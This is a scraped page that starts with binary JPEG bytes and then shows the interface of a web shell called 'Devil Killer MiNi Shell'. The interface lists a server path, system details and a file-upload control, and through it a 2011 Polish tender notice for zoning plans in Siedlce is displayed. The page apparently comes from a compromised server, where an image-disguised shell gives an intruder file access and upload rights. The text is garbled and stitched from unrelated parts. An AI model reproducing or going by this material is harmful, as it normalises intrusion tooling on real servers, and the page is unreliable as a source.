JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111005/261949-N-2011.html

<p class="kh_header"><b>Siedlce: Sporządzenie miejscowego planu zagospodarowania przestrzennego dla części terenu miasta Siedlce</b><br>
<b>Numer ogłoszenia: 261949 - 2011; data zamieszczenia: 05.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Siedlce , Skwer Niepodległości 2, 08-110 Siedlce, woj. mazowieckie, tel. 025 6430785, faks 025 6430718.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siedlce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie miejscowego planu zagospodarowania przestrzennego dla części terenu miasta Siedlce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie miejscowego planu zagospodarowania przestrzennego dla części terenu miasta Siedlce.

Przedmiot zamówienia został podzielony na cztery części, na które składają się:

Część I:	Sporządzenie miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Żytniej w Siedlcach. 
Część II:	Sporządzenie miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Władysława Jagiełły w Siedlcach. 
Część III:	Sporządzenie miejscowego planu zagospodarowania przestrzennego pn. SZPITAL i PARKI w Siedlcach.
Część IV:	Sporządzenie miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Spokojnej.

Zakres prac zgodnie z Załącznikiem I Informacje dotyczące ofert częściowych dla każdej części..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych (złożonego przez wykonawcę zgodnie z treścią załącznika nr 3 do siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że wykonał co najmniej dwa miejscowe plany zagospodarowania przestrzennego terenu miasta o liczebności min. 50 tys. mieszkańców o obszarze opracowania min. 50 ha (dla każdej części). Opracowanie winno być wykonane na podstawie ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80, poz.717, z póź. zm.) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych (złożonego przez wykonawcę zgodnie z treścią załącznika nr 3 do siwz).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje osobami, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług, posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne dla wykonania zamówienia, tj.: 
- osobą pełniącą funkcję głównego projektanta planu. Główny projektant musi wykazać się wykonaniem bądź wykonywaniem prac nad min. jednym projektem miejscowego planu zagospodarowania przestrzennego dla terenu miasta o liczebności min. 50 tys. mieszkańców o obszarze opracowania wynoszącym min. 50 ha, wykonanym w procedurze ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80, poz.717, 
z póź. zm.).
- co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń  w specjalności architektonicznej. 
- co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej. 
- co najmniej jedną osobą posiadającą uprawnienia zawodowe w zakresie szacowania nieruchomości.
- co najmniej jedną osobą posiadającą doświadczenie w pracy z oprogramowaniem EWMAPA i WINPLAN.

Zamawiający dopuszcza połączenie wyżej wskazanych funkcji, pod warunkiem spełniania przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.

UWAGA:
Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom Państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Praw budowlane (tekst jedn. Dz. U.  z 2006 r. nr 156, poz. 118 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych (złożonego przez wykonawcę zgodnie z treścią załącznika nr 3 do siwz).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siedlce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Referat Zamówień Publicznych Urzędu Miasta Siedlce, 08-110 Siedlce, Skwer Niepodległości 2,  pok. nr 3, (cena: 7,56 zł brutto + koszt przesyłki)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.10.2011 godzina 09:45, miejsce: Kancelaria Ogólna Urzędu Miasta Siedlce, pokój Nr 30, Skwer  Niepodległości 2,  08-110 Siedlce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sporządzenie miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Żytniej w Siedlcach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie, zgodnie z obowiązującymi przepisami prawa, miejscowego  planu zagospodarowania przestrzennego w rejonie ulicy Żytniej w Siedlcach, dla terenu o powierzchni ok. 70 ha, ograniczonego ulicami: Sokołowską, Cmentarną i Piaskową w Siedlcach. 
Do wyżej wymienionego obszaru od strony południowej (w niewielkiej części) przylega obszar objęty ustaleniami Miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Biskupa Świrskiego uchwalonego Uchwałą  Nr LVIII/825/2010 Rady Miasta Siedlce z dnia 25 czerwca 2010 roku. Natomiast od strony południowo-zachodniej Miejscowy plan zagospodarowania przestrzennego miasta Siedlce w rejonie ulicy Piaskowej, uchwalony Uchwałą Rady Miasta Siedlce z dnia 22 grudnia 2005r. Nr XL/641/2005.
Przedmiotowy obszar określany jest jako fragment osiedla  Żytnia. Współtworzą go tereny zabudowy mieszkaniowej wielorodzinnej i jednorodzinnej oraz łąki i tereny rolne.  
W granicach obszaru, na niewielkiej jego części obowiązuje zmiana miejscowego planu ogólnego zagospodarowania przestrzennego miasta Siedlce - dotycząca trasy ulicy o symbolu 38KUZo1/2, uchwalona Uchwałą Nr XXVII/394/2000 Rady Miasta Siedlce z dnia 26 października 2000 roku.
Przedmiotem planu będzie określenie przeznaczenia terenów, w tym dla inwestycji celu publicznego oraz sposobów ich zagospodarowania i zabudowy zgodnie z wyznaczonym
w Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce oraz 
w myśl art. 15 ust. 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717 z późn .zm.) z wykorzystaniem analiz stanu istniejącego oraz przepisami odrębnymi odnoszącymi się do obszaru objętego opracowaniem. 
Obszar będący przedmiotem opracowania planu w Studium znajduję się w następujących terenach:
-parków i skwerów bez prawa zabudowy,
-mieszkaniowo-usługowych w tym obszar wymagający scaleń i podziału  nieruchomości,
-większych terenów i koncentracji usług z dopuszczeniem zabudowy mieszkaniowej jako funkcji towarzyszącej,
-lokalizacji inwestycji celu publicznego - poszerzanych i nowych ulic wymagających wykupu terenu,   
-użytku ekologicznego,
-ochrony zachowanych elementów zabytkowych.  
Obszar wymagający scalenia i podziału nieruchomości  wyznaczony w Studium obejmuje teren  o powierzchni ok. 10 ha.	

Realizacja zamówienia będzie składać się z niżej wymienionych części:

1)Część 1 - analiza danych wejściowych i przygotowanie koncepcji projektu planu: 
a)analiza stanu istniejącego i zgodności z ustaleniami Studium polegająca  w szczególności na analizie istniejących funkcji, parametrów, cech i wskaźników kształtowania zabudowy oraz zagospodarowania terenu, gabarytów i formy architektonicznej obiektów budowlanych, linii zabudowy, intensywności wykorzystania terenu, dostępności do dróg publicznych, istniejącego lub projektowanego uzbrojenia terenu zabudowy i zagospodarowania w relacji do przyjętych kierunków zagospodarowania przestrzennego w Studium, wykonana na podstawie materiałów geodezyjnych,  inwentaryzacji urbanistycznej, wydanych decyzji o warunkach zabudowy i zagospodarowania terenu, o pozwoleniu na budowę oraz zezwoleń na realizację inwestycji drogowej - w formie opisowej i graficznej w 2 egz. oraz w 1egz. 
w formie numerycznej,
b)analiza wniosków złożonych do projektu  planu zagospodarowania przestrzennego wraz 
z propozycją ich uwzględnienia oraz opracowanie uzasadnień  nieuwzględnienia wniosków w 1 egz. oraz w 1 egz. w formie numerycznej,  
c)opracowanie koncepcji projektu planu zawierającej co najmniej dwa warianty rozwiązań alternatywnych w skali 1:2000, uwzględniającej wyniki z dokonanej analizy, opracowania ekofizjograficznego oraz zawierającej dla proponowanych jednostek terenowych dane o istniejących  średnich wielkościach powierzchni zabudowy w stosunku do powierzchni działek, średnich wysokościach budynków oraz obiektów, których wysokość wynika z potrzeb technologicznych, średnich szerokościach elewacji frontowych budynków, występujących najczęściej geometriach dachów, w tym kierunków głównych kalenic dachów w stosunku  do frontów działek, kątów  nachylenia połaci dachowych  - po 1 egz. i 1 egz. w formie numerycznej.
2)Część 2 - projektowanie:
a)opracowanie projektu planu, składającego się z projektu uchwały  zawierającej część tekstową tj.: ustalenia planu, część graficzną tj.: rysunku  planu w skali 1: 1000 w 1 egz., przedstawionego na kopii mapy zasadniczej,  udostępnionej przez  Zamawiającego, z określeniem dla terenu wymagającego scaleń i podziału oznaczonego w studium uikzp symbolem oSPN-3 zalecanego podziału na działki budowlane.
b)opracowanie projektu planu w 1 egz. w następującej   formie publikacji  elektronicznej na płycie CD: 
-przygotowanie projektu planu w formie publikacji elektronicznej na płycie CD 
w oprogramowaniu  EWMAPA firmy GEOBID z Katowic (co  najmniej wersja 8,00),   wymagane uzgodnienie w z Referatem Geodezji struktury danych przed przystąpieniem do opracowania projektu planu,  
-zapis treści  uchwały w formie dokumentu co najmniej WORD  2000,
c)przeprowadzenie analizy, o której mowa w § 7 ust. 2 rozporządzenia Ministra  Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków  technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie  (Dz. U. Nr 43, poz.430 z póź. zm.) w odniesieniu do sytuacji dopuszczenia  mniejszych  szerokości ulic publicznych w liniach rozgraniczających , od określonych  w § 7  ust. 1 w/w rozporządzenia  - w 2 egz. oraz 1 egz. w formie numerycznej,
3)Część 3 - sporządzenie prognozy oddziaływania na środowisko i prognozy skutków finansowych:
a)opracowanie prognozy oddziaływania na środowisko uwzględniającej wymagania zawarte w przepisach ustawy z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie  środowiska oraz o ocenach oddziaływania na środowisko Dz. U. Nr 199, poz. 1227, z póź. zm.), w tym   w szczególności w art. 51 i  art. 52 , oraz uzgodniony z organami właściwymi zakres i wymagany stopień szczegółowości informacji, - w 2egz. oraz w 1 egz.  w formie numerycznej,
b)sporządzenie prognozy skutków finansowych uchwalenia planu  uwzględniającej wymagania rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania  przestrzennego (Dz. U. Nr  164, poz. 1587) oraz przepisów  o gospodarce  nieruchomościami w odniesieniu do zasad i do osób uprawnionych  do określania tych skutków, zawierającej:
-prognozę wpływu ustaleń planu na dochody własne i wydatki miasta, w tym na:
a.wpływy z podatku od nieruchomości,
b.inne dochody związane z obrotem nieruchomościami miasta,
c.na opłaty i odszkodowania, o których mowa w art. 36 ustawy o planowaniu  
i zagospodarowaniu przestrzennym z wyodrębnieniem poszczególnych funkcji przeznaczenia terenu,
-prognozę wpływu ustaleń planu na wydatki związane z realizacją inwestycji 
z zakresu infrastruktury technicznej, które należą do zadań własnych miasta,  
-wnioski i zalecenia dotyczące przyjęcia proponowanych rozwiązań projektu  planu,   w tym stawek  procentowych, na podstawie których ustala się opłatę, o której   mowa w art. 36 ust. 4 ustawy o planowaniu i zagospodarowaniu  przestrzennym,  wynikające z uwzględnienia ich skutków finansowych, 
-w 1 egz. oraz w 1 egz. w formie numerycznej.
4)Część IV- komisja urbanistyczno-architektoniczna:
a)przygotowanie pisemnej analizy stanowiska komisji urbanistyczno - architektonicznej 
o projekcie  planu, zawierającej propozycję rozpatrzenia opinii oraz  merytoryczne uzasadnienie nieuwzględnienia uwag,
b)wprowadzenie do projektu planu, uwzględnionych przez Zamawiającego, korekt wynikających z uzyskanej opinii komisji urbanistyczno-architektonicznej,
c)przekazanie materiałów, określonych w części IV lit. a) i b) w 1 egz. oraz w 1egz. 
w formie numerycznej.
5)Część V- uzgadnianie:
a)przygotowanie pisemnej analizy opinii i uzgodnień  organów właściwych o projekcie  planu i prognozie  oddziaływania na środowisko, zawierającej propozycję rozpatrzenia  
i uwzględnienia poszczególnych uwag w sporządzanych dokumentach wraz 
z merytorycznym  uzasadnieniem   stanowiska, 
b)wprowadzenie odpowiednio do projektu planu i prognozy oddziaływania na środowisko uwzględnionych przez Zamawiającego korekt, wynikających z uzyskanych opinii 
i dokonanych uzgodnień organów,  
c)przekazanie materiałów w 1 egz. oraz w 1 egz. w formie publikacji elektronicznej  na płycie CD, o których mowa w części V lit. a/ i lit. b).  
6)Część VI - wyłożenie i dyskusja publiczna oraz sposób realizacji infrastruktury technicznej:
a)uczestniczenie w dyżurze autorskim i dyskusji publicznej w czasie wyłożenia do publicznego wglądu  projektu planu wraz z prognozą oddziaływania na środowisko
b)opracowanie analizy uwag wniesionych do projektu planu wraz z propozycją ich  uwzględnienia oraz uzasadnieniem nieuwzględnienia pozostałych z wyodrębnieniem na wniesione na podstawie ustawy o planowaniu i zagospodarowaniu oraz ustawy 
o udostępnianiu informacji o środowisku () w 1egz. oraz w 1 egz. w formie numerycznej,
c)wprowadzenie do projektu planu korekt wynikających z rozpatrzenia uwag, zaakceptowanych przez Zamawiającego,
d)przekazanie skorygowanego projektu planu Zamawiającemu w 1 egz. oraz w 1 egz. 
w formie publikacji elektronicznej na płycie CD,
e)wprowadzenie do projektu planu korekt wynikających z ponawianych czynności 
w związku z uwzględnieniem uwag i  przekazywanie  materiałów Zamawiającemu. 
f)opracowanie sposobów realizacji zapisanych w  planie, inwestycji z zakresu  infrastruktury technicznej, które należą do zadań własnych gminy oraz zasad  ich finansowania, zgodnie 
z przepisami o finansach publicznych -1 egz. oraz w 1 egz.  w formie numerycznej, 
7)Część VII - uchwalenie:
a)przedstawienie projektu planu miejscowego na posiedzeniu Komisji Gospodarki Przestrzennej i Ochrony Środowiska oraz na Sesji Rady Miasta do uchwalenia wraz 
z załącznikami,
b)przekazanie skorygowanego projektu planu Zamawiającemu w 5 egz.  oraz w 1 egz. 
w formie publikacji elektronicznej na płycie CD, łącznie z listą  nieuwzględnionych uwag oraz określeniem sposobu realizacji, zapisanych w  planie  inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych miasta, oraz zasad ich finansowania, zgodnie z przepisami o finansach publicznych.
c)opracowanie pisemnego podsumowania i uzasadnienia, o których mowa w art. 42 pkt 2)  i  art. 55 ust. 3 ustawy o udostępnianiu informacji o środowisku ()
d)ewentualne wprowadzenie zmian do projektu planu wniesionych przez Radę Miasta i udział w czynnościach ponowionej, w niezbędnym zakresie, procedury planistycznej,
e)udział w czynnościach niezbędnych do ewentualnego doprowadzenia planu do zgodności z przepisami prawnymi, w sytuacji stwierdzenia nieważności uchwały 
w sprawie  planu, w tym udział w postępowaniu przed sądami administracyjnymi,
f)udzielanie ewentualnych wyjaśnień Wojewodzie, któremu została przedstawiona  uchwała o uchwaleniu planu miejscowego wraz z załącznikami, do ich oceny pod względem zgodności  z przepisami prawa,
g)przygotowanie uchwały w formacie Edytora Aktów Prawnych  XML do publikacji 
w Dzienniku Urzędowym Województwa Mazowieckiego,
h)przygotowanie części opisowej planu w oprogramowaniu WINPLAN firmy GEOBID z Katowic (co  najmniej wersja 8,00).

Przy realizacji zamówienia na sporządzenie  miejscowego planu zagospodarowania przestrzennego w rejonie ulicy Żytniej w Siedlcach konieczne jest zastosowania 
co  najmniej wersji 8,0 oprogramowania WINPLAN i EWMAPA firmy Geobid z Katowic  oraz edytora tekstu co najmniej Word 2000..</p></li>
